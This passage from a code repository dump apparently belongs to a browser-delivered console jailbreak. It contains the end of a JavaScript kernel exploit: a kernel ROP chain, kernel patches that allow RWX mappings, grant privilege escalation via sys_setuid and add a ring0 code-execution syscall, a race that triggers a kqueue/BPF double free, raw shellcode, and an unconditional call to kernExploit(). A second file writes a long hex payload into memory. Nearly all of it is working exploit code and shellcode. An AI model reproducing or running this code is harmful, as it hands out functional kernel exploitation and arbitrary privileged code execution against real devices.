271 | krop.push(window.gadgets["pop rsi"]);
272 | krop.push(0x3609A);
273 | krop.push(window.gadgets["add rax, rsi"]);
274 | krop.push(window.gadgets["mov rax, [rax]"]);
275 | krop.push(window.gadgets["pop rdi"]);
276 | krop.push(kscratch.add32(0x330));
277 | krop.push(window.gadgets["mov [rdi], rax"]);
278 |
279 | // Patch sys_mprotect: Allow RWX mapping
280 | patch_mprotect = new int64(0x9090FA38, 0x90909090);
281 | kpatch(0x3609A, patch_mprotect);
282 |
283 | // Patch bpf_cdevsw: add back in bpfwrite() implementation for kernel primitives
284 | kpatch(0x133C344, shellbuf);
285 |
286 | // Patch sys_setuid: add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
287 | var patch_sys_setuid_offset = new int64(0xFFEE6F06, 0xFFFFFFFF);
288 | var patch_sys_setuid = new int64(0x000000B8, 0xC4894100);
289 | kpatch(patch_sys_setuid_offset, patch_sys_setuid);
290 |
291 | // Patch amd64_syscall: syscall instruction allowed anywhere
292 | var patch_amd64_syscall_offset1 = new int64(0xFFE92927, 0xFFFFFFFF);
293 | var patch_amd64_syscall_offset2 = new int64(0xFFE92945, 0xFFFFFFFF);
294 | var patch_amd64_syscall_1 = new int64(0x00000000, 0x40878B49);
295 | var patch_amd64_syscall_2 = new int64(0x90907DEB, 0x72909090);
296 | kpatch(patch_amd64_syscall_offset1, patch_amd64_syscall_1);
297 | kpatch(patch_amd64_syscall_offset2, patch_amd64_syscall_2);
298 |
299 | // Patch: sys_mmap: allow RWX mapping from anywhere
300 | var patch_sys_mmap_offset = new int64(0xFFFCFAB4, 0xFFFFFFFF);
301 | var patch_sys_mmap = new int64(0x37B64037, 0x3145C031);
302 | kpatch(patch_sys_mmap_offset, patch_sys_mmap);
303 |
304 | // Patch sys_dynlib_dlsym: allow dynamic resolving from anywhere
305 | var patch_sys_dynlib_dlsym_1 = new int64(0x000000E9, 0x8B489000);
306 | var patch_sys_dynlib_dlsym_2 = new int64(0x90C3C031, 0x90909090);
307 | kpatch(0xCA3CE, patch_sys_dynlib_dlsym_1);
308 | kpatch(0x144AB4, patch_sys_dynlib_dlsym_2);
309 |
310 | // Patch sysent entry #11: sys_kexec() custom syscall to execute code in ring0
311 | var patch_sys_exec_1 = new int64(0x00F0ECB4, 0);
312 | var patch_sys_exec_2A = new int64(0x00F0ECBC, 0);
313 | var patch_sys_exec_2B = new int64(0xFFEA58F4, 0xFFFFFFFF);
314 | var patch_sys_exec_3 = new int64(0x00F0ECDC, 0);
315 | var patch_sys_exec_param1 = new int64(0x02, 0);
316 | var patch_sys_exec_param3 = new int64(0, 1);
317 | kpatch(patch_sys_exec_1, patch_sys_exec_param1);
318 | kpatch2(patch_sys_exec_2A, patch_sys_exec_2B);
319 | kpatch(patch_sys_exec_3, patch_sys_exec_param3);
320 |
321 | // Enable kernel write protection for .text
322 | krop.push(window.gadgets["pop rax"]);
323 | krop.push(kscratch.add32(0x08));
324 | krop.push(window.gadgets["mov rax, [rax]"]);
325 | krop.push(window.gadgets["pop rsi"]);
326 | krop.push(0x09);
327 | krop.push(window.gadgets["add rax, rsi"]);
328 | krop.push(window.gadgets["mov rdi, rax"]);
329 | krop.push(window.gadgets["pop rax"]);
330 | krop.push(kscratch.add32(0x10)); // Restore old cr0 value with WP bit set
331 | krop.push(window.gadgets["mov rax, [rax]"]);
332 | krop.push(window.gadgets["jmp rdi"]);
333 |
334 | krop.push(offsetToWebKit(0x5CDB9)); // Clean up stack
335 | krop.push(kscratch.add32(0x1000));
336 |
337 | var kq = p.malloc32(0x10);
338 | var kev = p.malloc32(0x100);
339 | kev.backing[0] = sock;
340 | kev.backing[2] = 0x1ffff;
341 | kev.backing[3] = 1;
342 | kev.backing[4] = 5;
343 |
344 | // Shellcode to clean up memory
345 | var shcode = [0x00008be9, 0x90909000, 0x90909090, 0x90909090, 0x0082b955, 0x8948c000, 0x415641e5, 0x53544155, 0x8949320f, 0xbbc089d4, 0x00000100, 0x20e4c149, 0x48c40949, 0x0096058d, 0x8d490000, 0xfe402494, 0x8d4dffff, 0xe09024b4, 0x8d4d0010, 0x5e8024ac, 0x81490043, 0x4b7160c4, 0x10894801, 0x00401f0f, 0x000002ba, 0xe6894c00, 0x000800bf, 0xd6ff4100, 0x393d8d48, 0x48000000, 0xc031c689, 0x83d5ff41, 0xdc7501eb, 0x41c0315b, 0x415d415c, 0x90c35d5e, 0x3d8d4855, 0xffffff78, 0x8948f631, 0x00e95de5, 0x48000000, 0x000bc0c7, 0x89490000, 0xc3050fca, 0x6c616d6b, 0x3a636f6c, 0x25783020, 0x6c363130, 0x00000a58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
346 | for (var i = 0; i < shcode.length; i++) {
347 | shellbuf.backing[i] = shcode[i];
348 | }
349 |
350 | // RACE!
351 | var iters = 0;
352 | start1();
353 | while (1) {
354 | race.count = 0;
355 |
356 | // Create a kqueue
357 | race.push(window.syscalls[362]);
358 | race.push(window.gadgets["pop rdi"]);
359 | race.push(kq);
360 | race.push(window.gadgets["mov [rdi], rax"]);
361 |
362 | // Race against the other thread
363 | race.push(window.gadgets["ret"]);
364 | race.push(window.gadgets["ret"]);
365 | race.push(window.gadgets["ret"]);
366 | race.push(window.gadgets["ret"]);
367 | race.push_write8(loop1, interrupt1);
368 | race.push(window.gadgets["pop rdi"]);
369 | race.push(fd);
370 | race.push(window.gadgets["pop rsi"]);
371 | race.push(0x8010427B);
372 | race.push(window.gadgets["pop rdx"]);
373 | race.push(bpf_valid_prog);
374 | race.push(window.syscalls[54]);
375 |
376 | // Attempt to trigger double free()
377 | race.push(window.gadgets["pop rax"]);
378 | race.push(kq);
379 | race.push(window.gadgets["mov rax, [rax]"]);
380 | race.push(window.gadgets["mov rdi, rax"]);
381 | race.push(window.gadgets["pop rsi"]);
382 | race.push(kev);
383 | race.push(window.gadgets["pop rdx"]);
384 | race.push(1);
385 | race.push(window.gadgets["pop rcx"]);
386 | race.push(0);
387 | race.push(window.gadgets["pop r8"]);
388 | race.push(0);
389 | race.push(window.syscalls[363]);
390 |
391 | // Spray via ioctl
392 | race.push(window.gadgets["pop rdi"]);
393 | race.push(fd1);
394 | race.push(window.gadgets["pop rsi"]);
395 | race.push(0x8010427B);
396 | race.push(window.gadgets["pop rdx"]);
397 | race.push(bpf_spray_prog);
398 | race.push(window.syscalls[54]);
399 |
400 | // Close the poisoned kqueue and run the kROP chain!
401 | race.push(window.gadgets["pop rax"]);
402 | race.push(kq);
403 | race.push(window.gadgets["mov rax, [rax]"]);
404 | race.push(window.gadgets["mov rdi, rax"]);
405 | race.push(window.syscalls[6]);
406 | iters++;
407 |
408 | // Gotta go fast!
409 | race.run();
410 | if (kscratch.backing[0] != 0) {
411 | // Hey, we won!
412 |
413 | // Clean up memory
414 | p.syscall("sys_mprotect", shellbuf, 0x4000, 7);
415 | p.fcall(shellbuf);
416 |
417 | // Refresh to a clean page
418 | location.reload();
419 |
420 | return true;
421 | }
422 | }
423 | } catch(ex) {
424 | fail(ex)
425 | }
426 |
427 | // failed
428 | return false;
429 | }
430 |
// Script entry point: kernExploit() is invoked unconditionally as soon as this
// file is evaluated, with no user interaction and no result check here.
// Its body (visible above) retries the race in a loop; when the win condition
// `kscratch.backing[0] != 0` is observed it maps `shellbuf` RWX via
// sys_mprotect, runs it with p.fcall, calls location.reload() and returns true.
// Any exception is routed to fail(ex) and the function then returns false, so
// the discarded return value only ever matters on the failure path.
kernExploit();
432 |
--------------------------------------------------------------------------------
/www/reactPSPlus.js:
--------------------------------------------------------------------------------
1 | function writeHomebrewEN(p, reactPSPlus, time) {
2 | p.write4(reactPSPlus.add32(0x00000000), 0x00005be9);
3 | p.write4(reactPSPlus.add32(0x00000004), 0x0f2e6600);
4 | p.write4(reactPSPlus.add32(0x00000008), 0x0000841f);
5 | p.write4(reactPSPlus.add32(0x0000000c), 0x90000000);
6 | p.write4(reactPSPlus.add32(0x00000010), 0x000082b9);
7 | p.write4(reactPSPlus.add32(0x00000014), 0x320f53c0);
8 | p.write4(reactPSPlus.add32(0x00000018), 0xbfd18948);
9 | p.write4(reactPSPlus.add32(0x0000001c), 0x0000000f);
10 | p.write4(reactPSPlus.add32(0x00000020), 0x20e1c148);
11 | p.write4(reactPSPlus.add32(0x00000024), 0x48cb8948);
12 | p.write4(reactPSPlus.add32(0x00000028), 0x8d48c309);
13 | p.write4(reactPSPlus.add32(0x0000002c), 0x6344d083);
14 | p.write4(reactPSPlus.add32(0x00000030), 0x48d0ff00);
15 | p.write4(reactPSPlus.add32(0x00000034), 0x3ed0838d);
16 | p.write4(reactPSPlus.add32(0x00000038), 0xbf5b0063);
17 | p.write4(reactPSPlus.add32(0x0000003c), time);
18 | p.write4(reactPSPlus.add32(0x00000040), 0x0f66e0ff);
19 | p.write4(reactPSPlus.add32(0x00000044), 0x0000441f);
20 | p.write4(reactPSPlus.add32(0x00000048), 0x0ff98948);
21 | p.write4(reactPSPlus.add32(0x0000004c), 0xd7894832);
22 | p.write4(reactPSPlus.add32(0x00000050), 0x20e7c148);
23 | p.write4(reactPSPlus.add32(0x00000054), 0xc3f80948);
24 | p.write4(reactPSPlus.add32(0x00000058), 0x00841f0f);
25 | p.write4(reactPSPlus.add32(0x0000005c), 0x00000000);
26 | p.write4(reactPSPlus.add32(0x00000060), 0x0b40bb49);
27 | p.write4(reactPSPlus.add32(0x00000064), 0x00000000);
28 | p.write4(reactPSPlus.add32(0x00000068), 0x8d480000);
29 | p.write4(reactPSPlus.add32(0x0000006c), 0xffffef15);
30 | p.write4(reactPSPlus.add32(0x00000070), 0xda014cff);
31 | p.write4(reactPSPlus.add32(0x00000074), 0xf470b848);
32 | p.write4(reactPSPlus.add32(0x00000078), 0xffffffff);
33 | p.write4(reactPSPlus.add32(0x0000007c), 0xb948ffff);
34 | p.write4(reactPSPlus.add32(0x00000080), 0xfffff502);
35 | p.write4(reactPSPlus.add32(0x00000084), 0xffffffff);
36 | p.write4(reactPSPlus.add32(0x00000088), 0x8d485741);
37 | p.write4(reactPSPlus.add32(0x0000008c), 0x89490234);
38 | p.write4(reactPSPlus.add32(0x00000090), 0x000bbfd7);
39 | p.write4(reactPSPlus.add32(0x00000094), 0xc0310000);
40 | p.write4(reactPSPlus.add32(0x00000098), 0xffd10148);
41 | p.write4(reactPSPlus.add32(0x0000009c), 0x41c031d1);
42 | p.write4(reactPSPlus.add32(0x000000a0), 0x3148c35f);
43 | p.write4(reactPSPlus.add32(0x000000a4), 0xca8949c0);
44 | p.write4(reactPSPlus.add32(0x000000a8), 0x0172050f);
45 | p.write4(reactPSPlus.add32(0x000000ac), 0x3d8348c3);
46 | p.write4(reactPSPlus.add32(0x000000b0), 0x00000b8b);
47 | p.write4(reactPSPlus.add32(0x000000b4), 0x50187400);
48 | p.write4(reactPSPlus.add32(0x000000b8), 0x0b8215ff);
49 | p.write4(reactPSPlus.add32(0x000000bc), 0x89590000);
50 | p.write4(reactPSPlus.add32(0x000000c0), 0xc0c74808);
51 | p.write4(reactPSPlus.add32(0x000000c4), 0xffffffff);
52 | p.write4(reactPSPlus.add32(0x000000c8), 0xffc2c748);
53 | p.write4(reactPSPlus.add32(0x000000cc), 0xc3ffffff);
54 | p.write4(reactPSPlus.add32(0x000000d0), 0x25c0c748);
55 | p.write4(reactPSPlus.add32(0x000000d4), 0xe9000000);
56 | p.write4(reactPSPlus.add32(0x000000d8), 0xffffffc9);
57 | p.write4(reactPSPlus.add32(0x000000dc), 0x36c0c748);
58 | p.write4(reactPSPlus.add32(0x000000e0), 0xe9000000);
59 | p.write4(reactPSPlus.add32(0x000000e4), 0xffffffbd);
60 | p.write4(reactPSPlus.add32(0x000000e8), 0x0bc0c748);
61 | p.write4(reactPSPlus.add32(0x000000ec), 0xe9000000);
62 | p.write4(reactPSPlus.add32(0x000000f0), 0xffffffb1);
63 | p.write4(reactPSPlus.add32(0x000000f4), 0x00401f0f);
64 | p.write4(reactPSPlus.add32(0x000000f8), 0xbb495741);
65 | p.write4(reactPSPlus.add32(0x000000fc), 0x00000aa8);
66 | p.write4(reactPSPlus.add32(0x00000100), 0x00000000);
67 | p.write4(reactPSPlus.add32(0x00000104), 0xed3d8d4c);
68 | p.write4(reactPSPlus.add32(0x00000108), 0x41ffffff);
69 | p.write4(reactPSPlus.add32(0x0000010c), 0xdf014d54);
70 | p.write4(reactPSPlus.add32(0x00000110), 0x07b84855);
71 | p.write4(reactPSPlus.add32(0x00000114), 0xfffffffc);
72 | p.write4(reactPSPlus.add32(0x00000118), 0x53ffffff);
73 | p.write4(reactPSPlus.add32(0x0000011c), 0x00a0bc49);
74 | p.write4(reactPSPlus.add32(0x00000120), 0x00000000);
75 | p.write4(reactPSPlus.add32(0x00000124), 0xbd480000);
76 | p.write4(reactPSPlus.add32(0x00000128), 0x00000028);
77 | p.write4(reactPSPlus.add32(0x0000012c), 0x00000000);
78 | p.write4(reactPSPlus.add32(0x00000130), 0xfb10bb48);
79 | p.write4(reactPSPlus.add32(0x00000134), 0xffffffff);
80 | p.write4(reactPSPlus.add32(0x00000138), 0x8348ffff);
81 | p.write4(reactPSPlus.add32(0x0000013c), 0x014c08ec);
82 | p.write4(reactPSPlus.add32(0x00000140), 0x04c74bfb);
83 | p.write4(reactPSPlus.add32(0x00000144), 0x0000003c);
84 | p.write4(reactPSPlus.add32(0x00000148), 0x748d4a00);
85 | p.write4(reactPSPlus.add32(0x0000014c), 0x8d49003d);
86 | p.write4(reactPSPlus.add32(0x00000150), 0xd3ff073c);
87 | p.write4(reactPSPlus.add32(0x00000154), 0x850fc085);
88 | p.write4(reactPSPlus.add32(0x00000158), 0x000004bc);
89 | p.write4(reactPSPlus.add32(0x0000015c), 0x0030b848);
90 | p.write4(reactPSPlus.add32(0x00000160), 0x00000000);
91 | p.write4(reactPSPlus.add32(0x00000164), 0x8b420000);
92 | p.write4(reactPSPlus.add32(0x00000168), 0x49003d7c);
93 | p.write4(reactPSPlus.add32(0x0000016c), 0x4807148d);
94 | p.write4(reactPSPlus.add32(0x00000170), 0xfffab0bb);
95 | p.write4(reactPSPlus.add32(0x00000174), 0xffffffff);
96 | p.write4(reactPSPlus.add32(0x00000178), 0x3cb848ff);
97 | p.write4(reactPSPlus.add32(0x0000017c), 0xfffffffc);
98 | p.write4(reactPSPlus.add32(0x00000180), 0x4cffffff);
99 | p.write4(reactPSPlus.add32(0x00000184), 0x8d49fb01);
100 | p.write4(reactPSPlus.add32(0x00000188), 0xd3ff0734);
101 | p.write4(reactPSPlus.add32(0x0000018c), 0x0068b848);
102 | p.write4(reactPSPlus.add32(0x00000190), 0x00000000);
103 | p.write4(reactPSPlus.add32(0x00000194), 0x8b420000);
104 | p.write4(reactPSPlus.add32(0x00000198), 0x49003d7c);
105 | p.write4(reactPSPlus.add32(0x0000019c), 0x4807148d);
106 | p.write4(reactPSPlus.add32(0x000001a0), 0xfffc4eb8);
107 | p.write4(reactPSPlus.add32(0x000001a4), 0xffffffff);
108 | p.write4(reactPSPlus.add32(0x000001a8), 0x348d49ff);
109 | p.write4(reactPSPlus.add32(0x000001ac), 0x42d3ff07);
110 | p.write4(reactPSPlus.add32(0x000001b0), 0x003d7c8b);
111 | p.write4(reactPSPlus.add32(0x000001b4), 0xfc5fb848);
112 | p.write4(reactPSPlus.add32(0x000001b8), 0xffffffff);
113 | p.write4(reactPSPlus.add32(0x000001bc), 0x8d4bffff);
114 | p.write4(reactPSPlus.add32(0x000001c0), 0x8d493c14);
115 | p.write4(reactPSPlus.add32(0x000001c4), 0xd3ff0734);
116 | p.write4(reactPSPlus.add32(0x000001c8), 0x0080b848);
117 | p.write4(reactPSPlus.add32(0x000001cc), 0x00000000);
118 | p.write4(reactPSPlus.add32(0x000001d0), 0x8b420000);
119 | p.write4(reactPSPlus.add32(0x000001d4), 0x49003d7c);
120 | p.write4(reactPSPlus.add32(0x000001d8), 0x4807148d);
121 | p.write4(reactPSPlus.add32(0x000001dc), 0xfffc67b8);
122 | p.write4(reactPSPlus.add32(0x000001e0), 0xffffffff);
123 | p.write4(reactPSPlus.add32(0x000001e4), 0x348d49ff);
124 | p.write4(reactPSPlus.add32(0x000001e8), 0x48d3ff07);
125 | p.write4(reactPSPlus.add32(0x000001ec), 0x0000c0b8);
126 | p.write4(reactPSPlus.add32(0x000001f0), 0x00000000);
127 | p.write4(reactPSPlus.add32(0x000001f4), 0x7c8b4200);
128 | p.write4(reactPSPlus.add32(0x000001f8), 0x8d49003d);
129 | p.write4(reactPSPlus.add32(0x000001fc), 0xb8480714);
130 | p.write4(reactPSPlus.add32(0x00000200), 0xfffffc76);
131 | p.write4(reactPSPlus.add32(0x00000204), 0xffffffff);
132 | p.write4(reactPSPlus.add32(0x00000208), 0x07348d49);
133 | p.write4(reactPSPlus.add32(0x0000020c), 0xb848d3ff);
134 | p.write4(reactPSPlus.add32(0x00000210), 0x000000e8);
135 | p.write4(reactPSPlus.add32(0x00000214), 0x00000000);
136 | p.write4(reactPSPlus.add32(0x00000218), 0x3d7c8b42);
137 | p.write4(reactPSPlus.add32(0x0000021c), 0x148d4900);
138 | p.write4(reactPSPlus.add32(0x00000220), 0x8fb84807);
139 | p.write4(reactPSPlus.add32(0x00000224), 0xfffffffc);
140 | p.write4(reactPSPlus.add32(0x00000228), 0x49ffffff);
141 | p.write4(reactPSPlus.add32(0x0000022c), 0xff07348d);
142 | p.write4(reactPSPlus.add32(0x00000230), 0x70b848d3);
143 | p.write4(reactPSPlus.add32(0x00000234), 0x00000000);
144 | p.write4(reactPSPlus.add32(0x00000238), 0x42000000);
145 | p.write4(reactPSPlus.add32(0x0000023c), 0x003d7c8b);
146 | p.write4(reactPSPlus.add32(0x00000240), 0x07148d49);
147 | p.write4(reactPSPlus.add32(0x00000244), 0xfcadb848);
148 | p.write4(reactPSPlus.add32(0x00000248), 0xffffffff);
149 | p.write4(reactPSPlus.add32(0x0000024c), 0x8d49ffff);
150 | p.write4(reactPSPlus.add32(0x00000250), 0xd3ff0734);
151 | p.write4(reactPSPlus.add32(0x00000254), 0x00b8b848);
152 | p.write4(reactPSPlus.add32(0x00000258), 0x00000000);
153 | p.write4(reactPSPlus.add32(0x0000025c), 0x8b420000);
154 | p.write4(reactPSPlus.add32(0x00000260), 0x49003d7c);
155 | p.write4(reactPSPlus.add32(0x00000264), 0x4807148d);
156 | p.write4(reactPSPlus.add32(0x00000268), 0xfffcc6b8);
157 | p.write4(reactPSPlus.add32(0x0000026c), 0xffffffff);
158 | p.write4(reactPSPlus.add32(0x00000270), 0x348d49ff);
159 | p.write4(reactPSPlus.add32(0x00000274), 0x48d3ff07);
160 | p.write4(reactPSPlus.add32(0x00000278), 0x000110b8);
161 | p.write4(reactPSPlus.add32(0x0000027c), 0x00000000);
162 | p.write4(reactPSPlus.add32(0x00000280), 0x7c8b4200);
163 | p.write4(reactPSPlus.add32(0x00000284), 0x8d49003d);
164 | p.write4(reactPSPlus.add32(0x00000288), 0xb8480714);
165 | p.write4(reactPSPlus.add32(0x0000028c), 0xfffffcd4);
166 | p.write4(reactPSPlus.add32(0x00000290), 0xffffffff);
167 | p.write4(reactPSPlus.add32(0x00000294), 0x07348d49);
168 | p.write4(reactPSPlus.add32(0x00000298), 0xb848d3ff);
169 | p.write4(reactPSPlus.add32(0x0000029c), 0x00000090);
170 | p.write4(reactPSPlus.add32(0x000002a0), 0x00000000);
171 | p.write4(reactPSPlus.add32(0x000002a4), 0x3d7c8b42);
172 | p.write4(reactPSPlus.add32(0x000002a8), 0x148d4900);
173 | p.write4(reactPSPlus.add32(0x000002ac), 0xe2b84807);
174 | p.write4(reactPSPlus.add32(0x000002b0), 0xfffffffc);
175 | p.write4(reactPSPlus.add32(0x000002b4), 0x49ffffff);
176 | p.write4(reactPSPlus.add32(0x000002b8), 0xff07348d);
177 | p.write4(reactPSPlus.add32(0x000002bc), 0xb0b848d3);
178 | p.write4(reactPSPlus.add32(0x000002c0), 0x00000000);
179 | p.write4(reactPSPlus.add32(0x000002c4), 0x42000000);
180 | p.write4(reactPSPlus.add32(0x000002c8), 0x003d7c8b);
181 | p.write4(reactPSPlus.add32(0x000002cc), 0x07148d49);
182 | p.write4(reactPSPlus.add32(0x000002d0), 0xfcf0b848);
183 | p.write4(reactPSPlus.add32(0x000002d4), 0xffffffff);
184 | p.write4(reactPSPlus.add32(0x000002d8), 0x8d49ffff);
185 | p.write4(reactPSPlus.add32(0x000002dc), 0xd3ff0734);
186 | p.write4(reactPSPlus.add32(0x000002e0), 0x00c8b848);
187 | p.write4(reactPSPlus.add32(0x000002e4), 0x00000000);
188 | p.write4(reactPSPlus.add32(0x000002e8), 0x8b420000);
189 | p.write4(reactPSPlus.add32(0x000002ec), 0x49003d7c);
190 | p.write4(reactPSPlus.add32(0x000002f0), 0x4807148d);
191 | p.write4(reactPSPlus.add32(0x000002f4), 0xfffcffb8);
192 | p.write4(reactPSPlus.add32(0x000002f8), 0xffffffff);
193 | p.write4(reactPSPlus.add32(0x000002fc), 0x348d49ff);
194 | p.write4(reactPSPlus.add32(0x00000300), 0x48d3ff07);
195 | p.write4(reactPSPlus.add32(0x00000304), 0x000048b8);
196 | p.write4(reactPSPlus.add32(0x00000308), 0x00000000);
197 | p.write4(reactPSPlus.add32(0x0000030c), 0x7c8b4200);
198 | p.write4(reactPSPlus.add32(0x00000310), 0x8d49003d);
199 | p.write4(reactPSPlus.add32(0x00000314), 0xb8480714);
200 | p.write4(reactPSPlus.add32(0x00000318), 0xfffffd0e);
201 | p.write4(reactPSPlus.add32(0x0000031c), 0xffffffff);
202 | p.write4(reactPSPlus.add32(0x00000320), 0x07348d49);
203 | p.write4(reactPSPlus.add32(0x00000324), 0xb848d3ff);
204 | p.write4(reactPSPlus.add32(0x00000328), 0x000000f0);
205 | p.write4(reactPSPlus.add32(0x0000032c), 0x00000000);
206 | p.write4(reactPSPlus.add32(0x00000330), 0x3d7c8b42);
207 | p.write4(reactPSPlus.add32(0x00000334), 0x148d4900);
208 | p.write4(reactPSPlus.add32(0x00000338), 0x1db84807);
209 | p.write4(reactPSPlus.add32(0x0000033c), 0xfffffffd);
210 | p.write4(reactPSPlus.add32(0x00000340), 0x49ffffff);
211 | p.write4(reactPSPlus.add32(0x00000344), 0xff07348d);
212 | p.write4(reactPSPlus.add32(0x00000348), 0x18b848d3);
213 | p.write4(reactPSPlus.add32(0x0000034c), 0x00000000);
214 | p.write4(reactPSPlus.add32(0x00000350), 0x42000000);
215 | p.write4(reactPSPlus.add32(0x00000354), 0x003d7c8b);
216 | p.write4(reactPSPlus.add32(0x00000358), 0x07148d49);
217 | p.write4(reactPSPlus.add32(0x0000035c), 0xfd2db848);
218 | p.write4(reactPSPlus.add32(0x00000360), 0xffffffff);
219 | p.write4(reactPSPlus.add32(0x00000364), 0x8d49ffff);
220 | p.write4(reactPSPlus.add32(0x00000368), 0xd3ff0734);
221 | p.write4(reactPSPlus.add32(0x0000036c), 0x00d8b848);
222 | p.write4(reactPSPlus.add32(0x00000370), 0x00000000);
223 | p.write4(reactPSPlus.add32(0x00000374), 0x8b420000);
224 | p.write4(reactPSPlus.add32(0x00000378), 0x49003d7c);
225 | p.write4(reactPSPlus.add32(0x0000037c), 0x4807148d);
226 | p.write4(reactPSPlus.add32(0x00000380), 0xfffd43b8);
227 | p.write4(reactPSPlus.add32(0x00000384), 0xffffffff);
228 | p.write4(reactPSPlus.add32(0x00000388), 0x348d49ff);
229 | p.write4(reactPSPlus.add32(0x0000038c), 0x48d3ff07);
230 | p.write4(reactPSPlus.add32(0x00000390), 0x000050b8);
231 | p.write4(reactPSPlus.add32(0x00000394), 0x00000000);
232 | p.write4(reactPSPlus.add32(0x00000398), 0x7c8b4200);
233 | p.write4(reactPSPlus.add32(0x0000039c), 0x8d49003d);
234 | p.write4(reactPSPlus.add32(0x000003a0), 0xb8480714);
235 | p.write4(reactPSPlus.add32(0x000003a4), 0xfffffd5b);
236 | p.write4(reactPSPlus.add32(0x000003a8), 0xffffffff);
237 | p.write4(reactPSPlus.add32(0x000003ac), 0x07348d49);
238 | p.write4(reactPSPlus.add32(0x000003b0), 0xb848d3ff);
239 | p.write4(reactPSPlus.add32(0x000003b4), 0x00000088);
240 | p.write4(reactPSPlus.add32(0x000003b8), 0x00000000);
241 | p.write4(reactPSPlus.add32(0x000003bc), 0x3d7c8b42);
242 | p.write4(reactPSPlus.add32(0x000003c0), 0x148d4900);
243 | p.write4(reactPSPlus.add32(0x000003c4), 0x72b84807);
244 | p.write4(reactPSPlus.add32(0x000003c8), 0xfffffffd);
245 | p.write4(reactPSPlus.add32(0x000003cc), 0x49ffffff);
246 | p.write4(reactPSPlus.add32(0x000003d0), 0xff07348d);
247 | p.write4(reactPSPlus.add32(0x000003d4), 0x28b848d3);
248 | p.write4(reactPSPlus.add32(0x000003d8), 0x00000001);
249 | p.write4(reactPSPlus.add32(0x000003dc), 0x42000000);
250 | p.write4(reactPSPlus.add32(0x000003e0), 0x003d7c8b);
251 | p.write4(reactPSPlus.add32(0x000003e4), 0x07148d49);
252 | p.write4(reactPSPlus.add32(0x000003e8), 0xfd79b848);
253 | p.write4(reactPSPlus.add32(0x000003ec), 0xffffffff);
254 | p.write4(reactPSPlus.add32(0x000003f0), 0x8d49ffff);
255 | p.write4(reactPSPlus.add32(0x000003f4), 0xd3ff0734);
256 | p.write4(reactPSPlus.add32(0x000003f8), 0x0078b848);
257 | p.write4(reactPSPlus.add32(0x000003fc), 0x00000000);
258 | p.write4(reactPSPlus.add32(0x00000400), 0x8b420000);
259 | p.write4(reactPSPlus.add32(0x00000404), 0x49003d7c);
260 | p.write4(reactPSPlus.add32(0x00000408), 0x4807148d);
261 | p.write4(reactPSPlus.add32(0x0000040c), 0xfffd86b8);
262 | p.write4(reactPSPlus.add32(0x00000410), 0xffffffff);
263 | p.write4(reactPSPlus.add32(0x00000414), 0x348d49ff);
264 | p.write4(reactPSPlus.add32(0x00000418), 0x48d3ff07);
265 | p.write4(reactPSPlus.add32(0x0000041c), 0x000038b8);
266 | p.write4(reactPSPlus.add32(0x00000420), 0x00000000);
267 | p.write4(reactPSPlus.add32(0x00000424), 0x7c8b4200);
268 | p.write4(reactPSPlus.add32(0x00000428), 0x8d49003d);
269 | p.write4(reactPSPlus.add32(0x0000042c), 0xb8480714);
270 | p.write4(reactPSPlus.add32(0x00000430), 0xfffffd8e);
271 | p.write4(reactPSPlus.add32(0x00000434), 0xffffffff);
272 | p.write4(reactPSPlus.add32(0x00000438), 0x07348d49);
273 | p.write4(reactPSPlus.add32(0x0000043c), 0xb848d3ff);
274 | p.write4(reactPSPlus.add32(0x00000440), 0x00000100);
275 | p.write4(reactPSPlus.add32(0x00000444), 0x00000000);
276 | p.write4(reactPSPlus.add32(0x00000448), 0x3d7c8b42);
277 | p.write4(reactPSPlus.add32(0x0000044c), 0x148d4900);
278 | p.write4(reactPSPlus.add32(0x00000450), 0x95b84807);
279 | p.write4(reactPSPlus.add32(0x00000454), 0xfffffffd);
280 | p.write4(reactPSPlus.add32(0x00000458), 0x49ffffff);
281 | p.write4(reactPSPlus.add32(0x0000045c), 0xff07348d);
282 | p.write4(reactPSPlus.add32(0x00000460), 0xd0b848d3);
283 | p.write4(reactPSPlus.add32(0x00000464), 0x00000000);
284 | p.write4(reactPSPlus.add32(0x00000468), 0x42000000);
285 | p.write4(reactPSPlus.add32(0x0000046c), 0x003d7c8b);
286 | p.write4(reactPSPlus.add32(0x00000470), 0x07148d49);
287 | p.write4(reactPSPlus.add32(0x00000474), 0xfda2b848);
288 | p.write4(reactPSPlus.add32(0x00000478), 0xffffffff);
289 | p.write4(reactPSPlus.add32(0x0000047c), 0x8d49ffff);
290 | p.write4(reactPSPlus.add32(0x00000480), 0xd3ff0734);
291 | p.write4(reactPSPlus.add32(0x00000484), 0x0108b848);
292 | p.write4(reactPSPlus.add32(0x00000488), 0x00000000);
293 | p.write4(reactPSPlus.add32(0x0000048c), 0x8b420000);
294 | p.write4(reactPSPlus.add32(0x00000490), 0x49003d7c);
295 | p.write4(reactPSPlus.add32(0x00000494), 0x4807148d);
296 | p.write4(reactPSPlus.add32(0x00000498), 0xfffdb9b8);
297 | p.write4(reactPSPlus.add32(0x0000049c), 0xffffffff);
298 | p.write4(reactPSPlus.add32(0x000004a0), 0x348d49ff);
299 | p.write4(reactPSPlus.add32(0x000004a4), 0x48d3ff07);
300 | p.write4(reactPSPlus.add32(0x000004a8), 0x000058b8);
301 | p.write4(reactPSPlus.add32(0x000004ac), 0x00000000);
302 | p.write4(reactPSPlus.add32(0x000004b0), 0x7c8b4200);
303 | p.write4(reactPSPlus.add32(0x000004b4), 0x8d49003d);
304 | p.write4(reactPSPlus.add32(0x000004b8), 0xb8480714);
305 | p.write4(reactPSPlus.add32(0x000004bc), 0xfffffdcf);
306 | p.write4(reactPSPlus.add32(0x000004c0), 0xffffffff);
307 | p.write4(reactPSPlus.add32(0x000004c4), 0x07348d49);
308 | p.write4(reactPSPlus.add32(0x000004c8), 0xb848d3ff);
309 | p.write4(reactPSPlus.add32(0x000004cc), 0x000000f8);
310 | p.write4(reactPSPlus.add32(0x000004d0), 0x00000000);
311 | p.write4(reactPSPlus.add32(0x000004d4), 0x3d7c8b42);
312 | p.write4(reactPSPlus.add32(0x000004d8), 0x148d4900);
313 | p.write4(reactPSPlus.add32(0x000004dc), 0xe5b84807);
314 | p.write4(reactPSPlus.add32(0x000004e0), 0xfffffffd);
315 | p.write4(reactPSPlus.add32(0x000004e4), 0x49ffffff);
316 | p.write4(reactPSPlus.add32(0x000004e8), 0xff07348d);
